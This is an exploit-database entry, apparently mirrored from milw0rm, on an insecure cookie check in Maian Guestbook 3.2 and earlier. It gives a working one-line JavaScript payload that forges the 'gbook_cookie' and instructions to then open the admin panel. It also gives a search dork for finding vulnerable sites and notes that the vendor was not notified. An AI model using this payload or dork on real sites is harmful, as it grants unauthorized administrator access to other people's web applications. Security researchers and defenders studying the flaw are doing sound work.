Lucene search

K
seebugRootSSV:65586
HistoryJul 01, 2014 - 12:00 a.m.

Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability

2014-07-0100:00:00
Root
www.seebug.org
2377

No description provided by source.


                                                -[*]+================================================================================+[*]-
-[*]+          Maian Guestbook &#60;= 3.2 Insecure Cookie Handling Vulnerability         +[*]-
-[*]+================================================================================+[*]-



[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by Maian Guestbook v3.2



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

   Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the

cookie exists.
    and not the content. so we can easyily craft a cookie and look like a admin.



[*] Vulnerability:

    javascript:document.cookie = &#34;gbook_cookie=1; path=/&#34;;


[*] NOTE/TIP:

    after running the javascript, visit &#34;/admin/index.php&#34; to view admin area.



-[*]+================================================================================+[*]-
-[*]+          Maian Guestbook &#60;= 3.2 Insecure Cookie Handling Vulnerability         +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-07-13]